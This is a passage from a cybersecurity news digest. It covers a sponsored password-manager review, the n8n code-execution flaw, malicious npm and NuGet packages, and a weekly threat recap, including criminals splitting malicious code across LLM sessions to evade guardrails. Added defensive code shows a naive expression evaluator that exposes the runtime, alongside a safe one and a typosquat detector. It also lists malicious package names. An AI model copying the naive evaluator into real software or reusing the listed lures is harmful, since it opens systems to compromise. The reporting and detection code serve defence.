- API credentials
- Database access
- Payment information
- Internal tools or system accounts

Sharing can be temporary or permanent, with individuals or groups. Permissions control a user’s level of access to a record: whether they can view it, edit it, or manage it. Activity tracking enables a team to understand how its credentials are being accessed and by whom.

Role-based access, sharing links, and detailed audit trails support common workplace scenarios such as new employee onboarding, transitions between departments, or restricted administrative access. Passwd’s Premium plans include unlimited records and users, designed to scale with an organization as it grows. The plan tier determines the features available, allowing businesses to adopt the level that fits their workflows.

Cross-platform access and usage

Passwd provides wide device compatibility with a lightweight footprint:

- Web access through any browser
- Chrome, Edge, and Firefox extensions
- Android and iOS mobile apps

Browser extensions handle autofill and credential capture without requiring large desktop applications.

This cross-platform consistency allows users to move from device to device without changing how they interact with stored data.

Built-in tools and functionality

Passwd contains the essential password-management utilities:

- A password generator able to create secure, random passwords
- Auditing tools for credentials that are weak, reused, or outdated
- Tags that give organization to records

The interface is free of complicated add-ons, favoring a clean, straightforward layout: search, filtering, and record editing are easily located and used.

Pricing structure and value

The pricing of Passwd is designed for organizational usage rather than individual licensing. The Workspace plan starts from $19 per month, including unlimited stored records.

A per-user pricing option is available for smaller teams or departments that aren’t using Workspace organization-wide, though the pay-per-workspace model may offer better overall efficiency. A free Starter plan allows unlimited users and up to 15 stored records, so it is highly accessible for small teams or early testing. The Enterprise plan is aimed at organizations that require GDPR and SOC 2 compliance, alongside advanced user monitoring. Its most distinctive benefit is that it lets you host the password manager inside your own Google Cloud project, an uncommon capability and an important added value compared to other team password managers.

This puts Passwd in the position of being an entry-level enterprise product, but without the need for enterprise-level pricing.

Customer feedback and observed reception

Passwd maintains a 4.7-star rating across third-party review platforms, including Trustpilot and G2. Feedback often highlights:

- Smooth integration with Google Workspace
- Fast onboarding through Google Identity
- Easier credential sharing across teams
- Clear access governance using Google Groups

Smaller teams often mention that the free tier provides enough functionality for centralized storage and secure sharing, while larger organizations use Passwd for its onboarding and role transitions.

Where Passwd fits and where it doesn’t

Based on its structure and feature set, Passwd aligns most naturally with organizations that:

- Already use Google Workspace company-wide
- Prefer a unified identity and authentication system
- Share passwords or credentials across teams
- Want admin visibility, compliance support, and access logs
- Need a scalable approach without paying per-seat licensing

However, Passwd is less applicable for organizations that:

- Require integrations beyond Google’s ecosystem
- Use multiple or diverse identity providers
- Operate outside Google Workspace environments

Its design intentionally prioritizes Workspace compatibility over platform versatility.

Closing overview

A walkthrough of Passwd shows a password manager built for predictability, efficiency, and organizational alignment rather than feature saturation. Its role is clear: provide strong encryption, controlled collaboration, compliance-ready visibility, and seamless Google authentication. For teams already living inside Google Workspace, Passwd becomes an extension of the workflows that are already in place, not another tool to manage, and handles shared credentials, enforces access governance, and protects sensitive information in a safe, structured manner.

This article is a contributed piece from one of our valued partners.

U.S. DoJ Seizes Fraud Domain Behind $14.6 Million Bank Account Takeover Scheme

The U.S. Justice Department (DoJ) on Monday announced the seizure of a web domain and database that it said was used to further a criminal scheme designed to target and defraud Americans by means of bank account takeovers. The domain in question, web3adspanels[.]org, was used as a backend web panel to host and manipulate illegally harvested bank login credentials. Visitors to the website are now greeted by a seizure banner that says the domain was taken down in an international law enforcement operation led by authorities from the U.S. and Estonia.

“The criminal group perpetrating the bank account takeover fraud delivered fraudulent advertisements through search engines, including Google and Bing,” the DoJ said. “These fraudulent advertisements imitate the sponsored search engine advertisements used by legitimate banking entities.” The ads served as a conduit to redirect unsuspecting users to fake bank websites operated by the threat actors, who harvested login credentials entered by victims through an unspecified malicious software program built into the sites. The stolen credentials were then used by the criminals to sign into legitimate bank websites, take over victims’ accounts, and drain their funds.

The scheme is estimated to have claimed 19 victims across the U.S. to date, including two companies in the Northern District of Georgia, leading to attempted losses of approximately $28 million and actual losses of approximately $14.6 million. The DoJ said the confiscated domain stored the stolen login credentials of thousands of victims, in addition to hosting a backend server that facilitated takeover fraud as recently as last month. According to information shared by the U.S. Federal Bureau of Investigation (FBI), the Internet Crime Complaint Center (IC3) has received more than 5,100 complaints related to bank account takeover fraud since January 2025, with reported losses upwards of $262 million. Users are advised to exercise caution when sharing personal information online or on social media; regularly monitor accounts for any financial irregularities; use unique, complex passwords; verify the banking website URL before signing in; and stay vigilant against phishing attacks or suspicious callers.

Critical n8n Flaw (CVSS 9.9) Enables Arbitrary Code Execution Across Thousands of Instances

A critical security vulnerability has been disclosed in the n8n workflow automation platform that, if successfully exploited, could result in arbitrary code execution under certain circumstances. The vulnerability, tracked as CVE-2025-68613 , carries a CVSS score of 9.9 out of a maximum of 10.0. Security researcher Fatih Çelik has been credited with discovering and reporting the flaw. The package has about 57,000 weekly downloads, according to statistics on npm.

“Under certain conditions, expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficiently isolated from the underlying runtime,” the maintainers of the npm package said. “An authenticated attacker could abuse this behavior to execute arbitrary code with the privileges of the n8n process. Successful exploitation may lead to full compromise of the affected instance, including unauthorized access to sensitive data, modification of workflows, and execution of system-level operations.” The issue affects versions from 0.211.0 up to, but not including, 1.120.4, and has been patched in 1.120.4, 1.121.1, and 1.122.0. Per the attack surface management platform Censys, there were 103,476 potentially vulnerable instances exposed as of December 22, 2025.

A majority of the instances are located in the U.S., Germany, France, Brazil, and Singapore. In light of the criticality of the flaw, users are advised to apply the updates as soon as possible. If immediate patching is not an option, limit workflow creation and editing permissions to trusted users and deploy n8n in a hardened environment with restricted operating system privileges and network access to mitigate the risk.
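The maintainers’ description, user-supplied expressions evaluated in a context not isolated from the runtime, is a general class of bug in any workflow engine that hands template expressions to the JavaScript engine itself. The block below is an added illustration written for this page: it is not n8n’s code, does not reproduce CVE-2025-68613, and makes no claim about how n8n actually evaluates expressions. It contrasts an evaluator that compiles the expression with `new Function` (so any global such as `process` is reachable to whoever can edit a workflow) with a restricted evaluator that accepts only `$json.a.b` style paths, resolves them by own-property lookup and refuses prototype members. The `$json` root, the `{{ }}` placeholder syntax and the sample item are assumptions of the example.

```javascript
// Added example (not n8n's code): two ways of evaluating workflow expressions.

// Naive evaluator: compiles the expression with the JavaScript engine. Globals such as
// `process` are in scope, so an authenticated workflow editor gets runtime access.
function naiveEvaluate(expr, item) {
  // eslint-disable-next-line no-new-func
  return new Function('$json', `return (${expr});`)(item.$json);
}

// Restricted evaluator: the grammar is a dotted path rooted at $json, nothing else.
const PATH_RE = /^\$json(?:\.[A-Za-z_][A-Za-z0-9_]*)*$/;
// Segments that would walk onto Object/Function prototypes instead of workflow data.
const BLOCKED_SEGMENTS = new Set(['constructor', '__proto__', 'prototype']);

function safeEvaluate(expr, item) {
  const path = expr.trim();
  if (!PATH_RE.test(path)) {
    throw new Error(`rejected expression: ${JSON.stringify(expr)}`);
  }
  let current = item.$json;
  for (const segment of path.split('.').slice(1)) {
    const isPlainObject = current !== null && typeof current === 'object';
    if (BLOCKED_SEGMENTS.has(segment) || !isPlainObject ||
        !Object.prototype.hasOwnProperty.call(current, segment)) {
      throw new Error(`unresolvable segment: ${segment}`);
    }
    current = current[segment];
  }
  return current;
}

// Replace every {{ expression }} placeholder in a parameter string using the given evaluator.
function renderTemplate(template, item, evaluate) {
  return template.replace(/\{\{([^}]*)\}\}/g, (_, inner) => String(evaluate(inner, item)));
}

// Constructed workflow item (what a previous node might have produced).
const sampleItem = { $json: { user: { name: 'alice' }, order: { id: 42 } } };

console.log(renderTemplate('Hello {{ $json.user.name }}, order {{ $json.order.id }}', sampleItem, safeEvaluate));
console.log('naive evaluator exposes process:', typeof naiveEvaluate('process', sampleItem) === 'object');
try {
  safeEvaluate('process.env', sampleItem);
} catch (err) {
  console.log('safe evaluator:', err.message);
}
```

The point of the restricted evaluator is not the regular expression but the resolution rule: every segment must be an own property of a plain object, so `$json.constructor.constructor` (the usual route from data back to `Function`) and any global name are rejected before anything is executed. Real engines that need arithmetic or function calls in expressions should parse to an AST and interpret it against an allowlist, which is the same idea with a larger grammar.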


FCC Bans Foreign-Made Drones and Key Parts Over U.S. National Security Risks

The U.S. Federal Communications Commission (FCC) on Monday announced a ban on all drones and critical drone components made in a foreign country, citing national security concerns. To that end, the agency has added to its Covered List uncrewed aircraft systems (UAS) and UAS critical components produced in a foreign country, as well as all communications and video surveillance equipment and services, pursuant to the 2025 National Defense Authorization Act (NDAA). This move will keep China-made drones such as those from DJI and Autel Robotics out of the U.S. market. The FCC said that while drones offer the potential to enhance public safety and innovation, criminals, hostile foreign actors, and terrorists can weaponize them to present serious threats to the U.S. It also noted that a further review by an Executive Branch interagency body with appropriate national security expertise, convened by the White House, led to a “specific determination” that UAS and UAS critical component parts produced in foreign countries pose “unacceptable risks to the national security of the United States and to the safety and security of U.S. persons.” The decision, it said, is being taken to safeguard Americans and restore American airspace sovereignty as the country prepares to host several mass-gathering events in the coming years, including the 2026 FIFA World Cup and the 2028 Summer Olympics.

“UAS and UAS critical components must be produced in the United States,” the FCC said. “This will reduce the risk of direct UAS attacks and disruptions, unauthorized surveillance, sensitive data exfiltration, and other UAS threats to the homeland.” “UAS and UAS critical components, including data transmission devices, communications systems, flight controllers, ground control stations, controllers, navigation systems, batteries, smart batteries, and motors produced in a foreign country, could enable persistent surveillance, data exfiltration, and destructive operations over U.S. territory.” The FCC noted that specific drones or components would be exempt if the U.S. Department of Homeland Security (DHS) determined they did not pose such risks.

The ban, however, does not impact a consumer’s ability to continue using drones they previously purchased, nor prevent retailers from continuing to sell, import, or market device models that were approved by the government this year. The development comes a week after U.S. President Donald Trump signed into law the National Defense Authorization Act for Fiscal Year 2026, which includes provisions to secure airspace against unmanned aircraft when they present a threat to the public. In late July 2024, the Covered List was updated to include Russian cybersecurity company Kaspersky, preventing it from directly or indirectly offering its security software in the country.


Fake WhatsApp API Package on npm Steals Messages, Contacts, and Login Tokens

Cybersecurity researchers have disclosed details of a new malicious package on the npm repository that works as a fully functional WhatsApp API, but also contains the ability to intercept every message and link the attacker’s device to a victim’s WhatsApp account. The package, named “ lotusbail ,” has been downloaded over 56,000 times since it was first uploaded to the registry by a user named “seiren_primrose” in May 2025. Of these, 711 downloads took place over the last week. The library is still available for download as of writing.

Under the cover of a functional tool, the malware “steals your WhatsApp credentials, intercepts every message, harvests your contacts, installs a persistent backdoor, and encrypts everything before sending it to the threat actor’s server,” Koi Security researcher Tuval Admoni said in a report published over the weekend. Specifically, it’s equipped to capture authentication tokens and session keys, message history, contact lists with phone numbers, as well as media files and documents. Notably, the library is modeled on @whiskeysockets/baileys, a legitimate WebSockets-based TypeScript library for interacting with the WhatsApp Web API. The interception is accomplished by means of a malicious WebSocket wrapper through which authentication information and messages are routed, allowing it to capture credentials and chats.

The stolen data is transmitted to an attacker-controlled URL in encrypted form. The attack doesn’t stop there: the package also harbors covert functionality to create persistent access to the victim’s WhatsApp account by hijacking the device-linking process with a hard-coded pairing code. “When you use this library to authenticate, you’re not just linking your application – you’re also linking the threat actor’s device,” Admoni said. “They have complete, persistent access to your WhatsApp account, and you have no idea they’re there.” Linking their device to the target’s WhatsApp not only gives the attackers continued access to contacts and conversations but also survives removal of the package from the system, since the threat actor’s device remains linked to the WhatsApp account until it’s unlinked from the app’s settings.

Koi Security’s Idan Dardikman told The Hacker News that the malicious activity is triggered when the developer uses the library to connect to WhatsApp. “The malware wraps the WebSocket client, so once you authenticate and start sending/receiving messages, the interception kicks in,” Dardikman said. “No special function needed beyond normal usage of the API. The backdoor pairing code also activates during the authentication flow – so the attacker’s device gets linked the moment you connect your app to WhatsApp.” Furthermore, “lotusbail” comes fitted with anti-debugging capabilities that cause it to enter into an infinite loop trap when debugging tools are detected, causing it to freeze execution.

“Supply chain attacks aren’t slowing down – they’re getting better,” Koi said. “Traditional security doesn’t catch this. Static analysis sees working WhatsApp code and approves it. Reputation systems have seen 56,000 downloads, and trust it. The malware hides in the gap between ‘this code works’ and ‘this code only does what it claims.’”

Malicious NuGet Packages Target the Crypto Ecosystem

The disclosure comes as ReversingLabs shared details of 14 malicious NuGet packages that impersonate Nethereum, a .NET integration library for the Ethereum blockchain, and other cryptocurrency-related tools to redirect transaction funds to attacker-controlled wallets when the transfer amount exceeds $100, or to exfiltrate private keys and seed phrases. The names of the packages, published from eight different accounts, are listed below:

- binance.csharp
- bitcoincore
- bybitapi.net
- coinbase.net.api
- googleads.api
- nbitcoin.unified
- nethereumnet
- nethereumunified
- netherеum.all
- solananet
- solnetall
- solnetall.net
- solnetplus
- solnetunified

The packages leveraged several techniques to lull users into a false sense of security, including inflating download counts and publishing dozens of new versions in a short amount of time to give the impression of active maintenance. The campaign dates all the way back to July 2025. The malicious functionality is injected such that it’s only triggered once the packages are installed by developers and the specific functions are embedded into other applications.

Notable among the packages is GoogleAds.API, which focuses on stealing Google Ads OAuth information instead of wallet secrets. “These values are highly sensitive, because they allow full programmatic access to a Google Ads account and, if leaked, attackers can impersonate the victim’s advertising client, read all campaign and performance data, create or modify ads, and even spend unlimited funds on a malicious or fraudulent campaign,” ReversingLabs said.
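Both halves of this story turn on names: an npm package that presents itself as a legitimate WhatsApp library, and NuGet packages built around the Nethereum and Solnet brands. A pre-install step can flag dependency names that are near misses of, or contain, packages the organisation already trusts, as well as names carrying non-ASCII look-alike characters. The block below is an added example, not code from Koi Security or ReversingLabs; the trusted list, the small confusables table (a handful of Cyrillic letters, whereas the real Unicode confusables set is far larger), the finding labels and the sample dependency names are constructed for the illustration, and the homoglyph entry is built into the sample rather than taken from the list above.

```javascript
// Added example (not from Koi Security or ReversingLabs): flag dependency names that
// impersonate trusted packages by homoglyph, typo, or brand-adjacent naming.

// Packages the organisation actually depends on (constructed list; unscoped, lower-case).
const TRUSTED_PACKAGES = ['nethereum', 'nbitcoin', 'solnet', 'coinbase'];

// Small subset of Unicode confusables: Cyrillic letters that render like Latin ones.
const CONFUSABLES = new Map([
  ['\u0430', 'a'], ['\u0435', 'e'], ['\u043e', 'o'], ['\u0440', 'p'],
  ['\u0441', 'c'], ['\u0445', 'x'], ['\u0443', 'y'], ['\u0456', 'i'],
]);

// Fold a name to an ASCII skeleton: drop an npm scope, lower-case, map confusables.
function skeleton(name) {
  const unscoped = name.replace(/^@[^/]+\//, '').toLowerCase();
  return Array.from(unscoped, (ch) => CONFUSABLES.get(ch) ?? ch).join('');
}

// List the non-ASCII code points in a name, e.g. ['U+0435'].
function nonAsciiCodePoints(name) {
  return Array.from(name)
    .filter((ch) => ch.codePointAt(0) > 0x7f)
    .map((ch) => 'U+' + ch.codePointAt(0).toString(16).toUpperCase().padStart(4, '0'));
}

// Standard edit distance (single-row dynamic programming).
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diagonal = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diagonal + cost);
      diagonal = above;
    }
  }
  return row[b.length];
}

// Audit a list of dependency names; returns one finding per (name, reason, trusted match).
function auditDependencyNames(names, trusted = TRUSTED_PACKAGES) {
  const trustedSet = new Set(trusted);
  const findings = [];
  for (const name of names) {
    if (trustedSet.has(name)) continue; // exact, trusted name
    const nonAscii = nonAsciiCodePoints(name);
    if (nonAscii.length > 0) findings.push({ name, reason: 'non-ascii', detail: nonAscii.join(',') });
    const folded = skeleton(name);
    for (const t of trusted) {
      if (folded === t) {
        findings.push({ name, reason: 'homoglyph-of', detail: t });
      } else if (levenshtein(folded, t) <= 1) {
        findings.push({ name, reason: 'typo-of', detail: t });
      } else if (folded.includes(t)) {
        findings.push({ name, reason: 'brand-adjacent', detail: t });
      }
    }
  }
  return findings;
}

// Constructed sample dependency list (the homoglyph entry uses Cyrillic U+0435 for "e").
const sampleDependencies = [
  'nethereum',        // genuine, trusted
  'nethereumnet',     // brand plus suffix
  'nbitcoin.unified', // brand plus suffix
  'neth\u0435reum',   // renders identically to nethereum
  'nbitcoins',        // one character off
  'ws',               // unrelated
];

for (const f of auditDependencyNames(sampleDependencies)) {
  console.log(`${f.name}: ${f.reason} ${f.detail}`);
}
```

Wire `auditDependencyNames` into the step that reads `package.json` or a `.csproj`/`packages.config` before restore, and treat any `non-ascii` or `homoglyph-of` finding as a hard failure; `brand-adjacent` names are worth a human look rather than an automatic block, since legitimate community packages are often named that way too.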

⚡ Weekly Recap: Firewall Exploits, AI Data Theft, Android Hacks, APT Attacks, Insider Leaks & More

Cyber threats last week showed how attackers no longer need big hacks to cause big damage. They’re going after the everyday tools we trust most — firewalls, browser add-ons, and even smart TVs — turning small cracks into serious breaches. The real danger now isn’t just one major attack, but hundreds of quiet ones using the software and devices already inside our networks. Each trusted system can become an entry point if it’s left unpatched or overlooked.

Here’s a clear look at the week’s biggest risks, from exploited network flaws to new global campaigns and fast-moving vulnerabilities.

⚡ Threat of the Week

Flaws in Multiple Network Security Products Come Under Attack — Over the past week, Fortinet, SonicWall, Cisco, and WatchGuard said vulnerabilities in their products have been exploited by threat actors in real-world attacks. Cisco said CVE-2025-20393, a critical flaw in AsyncOS, has been exploited by a China-nexus advanced persistent threat (APT) actor codenamed UAT-9686 to deliver malware such as ReverseSSH (aka AquaTunnel), Chisel, AquaPurge, and AquaShell. The flaw remains unpatched.

SonicWall said attacks exploiting CVE-2025-40602, a local privilege escalation flaw impacting Secure Mobile Access (SMA) 100 series appliances, have been observed in connection with CVE-2025-23006 (CVSS score 9.8) to achieve unauthenticated remote code execution with root privileges. The development comes as firewalls and edge appliances have become a favorite target, giving attackers deeper visibility into traffic, VPN connections, and downstream systems.

🔔 Top News

Featured Chrome Extension Caught Harvesting AI Chats — Urban VPN Proxy, a Google Chrome and Microsoft Edge extension with more than 7.3 million installations, was observed stealthily gathering every prompt entered by users into artificial intelligence (AI)-powered chatbots like OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI, and Perplexity. Three other extensions from the same developer, 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker, were also updated with similar functionality.

Collectively, these add-ons were installed more than eight million times. The extensions are no longer available for download from the Chrome Web Store. Ink Dragon Targets Governments with ShadowPad and FINALDRAFT — The threat actor known as Jewelbug (CL-STA-0049, Earth Alux, Ink Dragon, and REF7707) has been increasingly focusing on government targets in Europe since July 2025, even as it continues to attack entities located in Southeast Asia and South America. The campaign has “impacted several dozen victims, including government entities and telecommunications organizations, across Europe, Asia, and Africa.” Ink Dragon does not merely use victims for data theft but actively repurposes them to support ongoing operations against other targets of interest.

This creates a self-sustaining infrastructure that obscures the true origin of the attacks while maximizing the utility of every compromised asset. Kimwolf Botnet Hijacks 1.8 Million Android TVs — A new botnet named Kimwolf is powered by no less than 1.8 million Android TVs. Infections are scattered globally, with Brazil, India, the U.S., Argentina, South Africa, and the Philippines registering higher concentrations. Kimwolf is believed to share its origins with AISURU, which has been behind some of the record-breaking DDoS attacks over the past year.

It’s suspected that the attackers reused code from AISURU in the early stages, before opting to develop the Kimwolf botnet to evade detection. QiAnXin XLab said it’s possible some of these attacks may not have come from AISURU alone, and that Kimwolf may be either participating or even leading the efforts. LongNosedGoblin Uses Group Policy For Malware Deployment — A previously undocumented China-aligned threat cluster dubbed LongNosedGoblin has been attributed to a series of cyber attacks targeting governmental entities in Southeast Asia and Japan. Central to the group’s tradecraft is the abuse of Group Policy to deploy malware across the compromised network and cloud services for communication with infected endpoints using a backdoor dubbed NosyDoor.

The threat actor is believed to be active since at least September 2023. The exact initial access methods used in the attacks are presently unknown. Kimsuky Uses DocSwap Android Malware — The North Korean threat actor known as Kimsuky has been linked to a new campaign that distributes a new variant of Android data gathering malware called DocSwap via QR codes hosted on phishing sites mimicking Seoul-based logistics firm CJ Logistics (formerly CJ Korea Express). The apps masquerade as package delivery service apps.

It’s believed that the threat actors are using smishing texts or phishing emails impersonating delivery companies to deceive recipients into clicking on booby-trapped URLs hosting the apps. A noteworthy aspect of the attack is its QR code-based mobile redirection, which prompts users visiting the URLs from a desktop computer to scan a QR code displayed on the page with their Android device to install the supposed shipment tracking app and look up the status.

🔥 Trending CVEs

Hackers act fast. They can use new bugs within hours. One missed update can cause a big breach. Here are this week’s most serious security flaws. Check them, fix what matters first, and stay protected. This week’s list includes — CVE-2025-14733 (WatchGuard), CVE-2025-11901, CVE-2025-14302, CVE-2025-14303, CVE-2025-14304 (pre-boot DMA protection bypass), CVE-2025-37164 (HPE OneView Software), CVE-2025-59374 (ASUS Live Update), CVE-2025-20393 (Cisco AsyncOS), CVE-2025-40602 (SonicWall SMA 100 Series), CVE-2025-66430 (Plesk), CVE-2025-33213 (NVIDIA Merlin Transformers4Rec for Linux), CVE-2025-33214 (NVIDIA NVTabular for Linux), CVE-2025-54947 (Apache StreamPark), CVE-2025-13780 (pgAdmin), CVE-2025-34352 (JumpCloud Agent), CVE-2025-14265 (ConnectWise ScreenConnect), CVE-2025-40806, CVE-2025-40807 (Siemens Gridscale X Prepay), CVE-2025-32210 (NVIDIA Isaac Lab), CVE-2025-64374 (Motors WordPress theme), CVE-2025-64669 (Microsoft Windows Admin Center), CVE-2025-46295 (Apache Commons Text), CVE-2025-68154 (systeminformation), CVE-2025-14558 (FreeBSD), and cross-site scripting and information disclosure flaws in Roundcube Webmail (no CVEs).

📰 Around the Cyber World

FBI Warns of Campaigns Impersonating Government Officials — The U.S. Federal Bureau of Investigation (FBI) has warned that malicious actors have impersonated senior U.S. state government, White House, and Cabinet-level officials, as well as members of Congress, to target individuals, including officials’ family members and personal acquaintances, since at least 2023. “Malicious actors have sent text messages and AI-generated voice messages — techniques known as smishing and vishing, respectively — that claim to come from a senior U.S. official to establish rapport with targeted individuals,” the FBI said. “In the scheme, actors contact an individual and briefly engage on a topic the victim is versed on, with a request to move communication to a secondary, encrypted mobile messaging application, happening almost immediately.” Once the conversation has shifted to Signal or WhatsApp, the threat actors urge victims to provide an authentication code that allows the actors to sync their device with the victim’s contact list, share personally identifiable information (PII) and copies of sensitive personal documents, wire funds to an overseas financial institution under false pretenses, and introduce the actor to a known associate.

Noyb Files Complaint Against TikTok, AppsFlyer and Grindr — Austrian privacy non-profit noyb has filed complaints against TikTok, AppsFlyer, and Grindr, accusing the popular video sharing platform of unlawfully tracking users across apps in violation of the GDPR. “A user found out about this unlawful tracking practice through an access request – which showed that, e.g. his usage of Grindr was sent to TikTok, likely via the Israeli tracking company AppsFlyer – which allows TikTok to draw conclusions about his sexual orientation and sex life,” noyb said. “TikTok initially even withheld this information from the user, which violates Article 15 GDPR. Only after repeated inquiries, TikTok revealed that it knows which apps he used, what he did within these apps (for example, adding a product to the shopping cart) - and that this data also included information about his usage of the gay dating app Grindr.”

AuraStealer Spotted in the Wild — An emerging malware-as-a-service (MaaS) information stealer called AuraStealer has been distributed via Scam-Yourself campaigns, where victims are lured by TikTok videos disguised as product activation guides. “Viewers are instructed to manually retype and run a displayed command in an administrative PowerShell, which, however, instead of activating the software, quietly downloads and executes the malicious payload,” Gen Digital said.

“Apart from TikTok Scam-Yourself campaigns, AuraStealer is also distributed through supposedly cracked games or software, with delivery chains of varying complexity.” AuraStealer makes use of a long list of anti-analysis and obfuscation techniques, including indirect control flow obfuscation, string encryption, and exception-driven API hashing, to resist attempts to reverse engineer the malware. It’s capable of harvesting data from Chromium- and Gecko-based browsers, cryptocurrency wallets from desktop applications and browser extensions, clipboard contents, session tokens, credentials, VPNs, password managers, screenshots, and detailed system metadata. Also detected in the wild are two other information stealers named Stealka and Phantom, with the latter distributed via fake Adobe installers.

Blind Eagle Continues to Attack Colombia — Colombian institutions have continued to face attacks from a threat actor known as Blind Eagle.

The latest phishing attacks, targeting agencies under the Ministry of Commerce, Industry and Tourism (MCIT), have shifted to a more sophisticated, multi-layer flow that uses an off-the-shelf loader named Caminho to deliver DCRat. The messages are sent from compromised email accounts within the same organization to bypass security checks. “The phishing email used a legal-themed design to lure the recipient,” Zscaler said. “The email was created to appear as an official message from the Colombian judicial system, referencing a labor lawsuit with an authentic-sounding case number and date.

The email pressures the recipient to confirm receipt immediately, leveraging authority, fear of legal consequences, and confidentiality warnings to trick the recipient into taking an action, namely opening the attachment.”

Scripted Sparrow Linked to Large-Scale BEC Attacks — A sprawling Business Email Compromise (BEC) collective known as Scripted Sparrow has been observed distributing more than three million email messages each month and refining its social-engineering playbook. “The scale of the group’s operation strongly suggests the use of automation to generate and send their attack messages,” Fortra said. “The group utilizes a combination of free webmail addresses as well as addresses on domains they’ve registered specifically for their operations. The group operates by posing as various executive coaching and leadership training consultancies.” First discovered in June 2024, the “loose collective of fraudsters” has members located in Nigeria, South Africa, Türkiye, Canada, and the U.S.

The group is estimated to have registered 119 domains and used 245 webmail addresses. It has also used 256 bank accounts to move money out of victims’ bank accounts.

Smart Devices Run Outdated Browser Versions — An academic study by a team of Belgian researchers has found that a majority of smart devices, such as smart TVs, e-readers, and gaming consoles, come with an embedded web browser that runs extremely outdated versions, sometimes as much as three years behind. All five e-readers that were tested, and 24 of 35 smart TV models, used embedded browsers that were at least three years behind current versions available to users of desktop computers.

These outdated, embedded browsers can leave users open to phishing and other security vulnerabilities. The authors said some of the issues lie in how development frameworks like Electron bundle browsers with other components. “We suspect that, for some products, this issue stems from the user-facing embedded browser being integrated with other UI components, making updates challenging – especially when bundled in frameworks like Electron, where updating the browser requires updating the entire framework,” they said in the paper. “This can break dependencies and increase development costs.”

Denmark Blames Russia For Attack on Water Utility — The Danish Defence Intelligence Service (DDIS) has blamed Russia for recent destructive and disruptive cyber attacks against the country, including a water utility in 2024, as well as distributed denial-of-service (DDoS) attacks on Danish websites in the run-up to the 2025 municipal and regional council elections.

The attacks have been attributed to pro-Russian hacktivist groups Z-Pentest and NoName057(16), respectively. “The Russian state uses both groups as instruments of its hybrid war against the West. The aim is to create insecurity in the targeted countries and to punish those who support Ukraine,” the DDIS said. “Russia’s cyber operations form part of a broader influence campaign intended to undermine Western support for Ukraine.” The statement comes a few days after a global cybersecurity advisory warned that pro-Russian hacktivist groups conduct opportunistic attacks against US and global critical infrastructure.

Russia Targeted by Arcane Werewolf — Russian manufacturing companies have become the target of a threat actor known as Arcane Werewolf (aka Mythic Likho). Campaigns undertaken by the hacking group in October and November 2025 likely leveraged phishing emails as the initial access vector that presumably contained links to a malicious archive hosted on the attackers’ server. The links directed victims to a spoofed website imitating a Russian manufacturing company. The end goal of the attacks is to deploy a custom implant named Loki 2.1 by means of a loader that’s delivered using a Go-based dropper downloaded from an external server using PowerShell code embedded into a Windows shortcut (LNK) contained in the ZIP file.

In an attack chain detected in November 2025, a new C++ dropper was used to propagate the malware. Loki 2.1 is equipped to upload/download files, inject code into a target process, terminate arbitrary processes, retrieve environment variables, and stop its own execution.

RansomHouse Upgrades to Complex Encryption — The RansomHouse (aka Jolly Scorpius) ransomware group has upgraded its file encryption process to use two different encryption keys to encrypt files as part of their attacks in what has been described as a significant escalation and “concerning trajectory” in ransomware development. “The upgraded version’s code reveals a two-factor encryption scheme where the file is encrypted with both a primary key and a secondary key.

Data encryption is processed separately for each key,” Palo Alto Networks Unit 42 said. “This significantly increases the difficulty of decrypting the data without both keys.” The e-crime group has been active since December 2021, listing 123 victims on its data leak site. Central to the threat actor’s operations is a tool called MrAgent that provides attackers with persistent access to a victim’s environment and simplifies managing compromised hosts at scale. It’s also responsible for deploying Mario to encrypt critical VM files in the ESXi hypervisor.

LLMs and Ransomware Lifecycle — The emergence of large language models (LLMs) is likely accelerating the ransomware lifecycle, according to new findings from SentinelOne. “We observe measurable gains in speed, volume, and multilingual reach across reconnaissance, phishing, tooling assistance, data triage, and negotiation, but no step-change in novel tactics or techniques driven purely by AI at scale,” the company said. LLMs, including those that are deployed locally, can be used to replace the manual effort associated with drafting phishing emails and localized content, search for sensitive data, and develop malicious code. The continued sightings of various dark LLMs show that criminals are gravitating toward uncensored models that allow them to evade guardrails.

“Actors already chunk malicious code into benign prompts across multiple models or sessions, then assemble offline to dodge guardrails,” SentinelOne said. “This workflow will become commoditized as tutorials and tooling proliferate, ultimately maturing into ‘prompt smuggling as a service.’” The findings signal that the barrier to entry into cybercrime continues to drop, even as the ransomware ecosystem is splintering and the line between nation-state and crimeware activity is increasingly blurring. The use of the technology is also likely to blur existing assessment lines around tradecraft and attribution, since it lets smaller groups acquire capabilities that were once limited to advanced state-backed actors.

TikTok Signs Agreement to Create New U.S. Joint Venture — Nearly a year after TikTok’s operations were briefly banned in the U.S. for national security concerns, the popular video-sharing platform said it has finalized a deal to move a substantial portion of its U.S. business under a new joint venture named TikTok USDS Joint Venture LLC. According to reports from Axios, Bloomberg, CNBC, and The Hollywood Reporter, the company has signed agreements with the three managing investors: Oracle, Silver Lake, and Abu Dhabi-based MGX.

Together, those companies will own 45% of the U.S. operation, while ByteDance retains a nearly 20% share. The new entity is said to be responsible for protecting U.S. data, ensuring the security of its prized algorithm, content moderation, and “software assurance.” Oracle will be the trusted security partner in charge of auditing and validating compliance.

The agreement is set to go into effect on January 22, 2026. Under a national security law, China-based ByteDance was required to divest TikTok’s U.S. operations or face an effective ban in the country. The U.S. government has since extended the ban four times as a deal was being hatched behind the scenes. Under President Donald Trump’s executive order in September, the attorney general was blocked from enforcing the national security law for a 120-day period in order to “permit the contemplated divestiture to be completed,” allowing the deal to finalize by January 23, 2026.

Android Adware Campaign Targets East and Southeast Asia — Android users in the Philippines, Pakistan, and Malaysia have been targeted by a large-scale Android adware campaign dubbed GhostAd that silently drains resources and disrupts normal phone use through persistent background activity. The set of 15 apps, distributed via Google Play, masqueraded as harmless utility and emoji-editing tools such as Vivid Clean and GenMoji Studio.

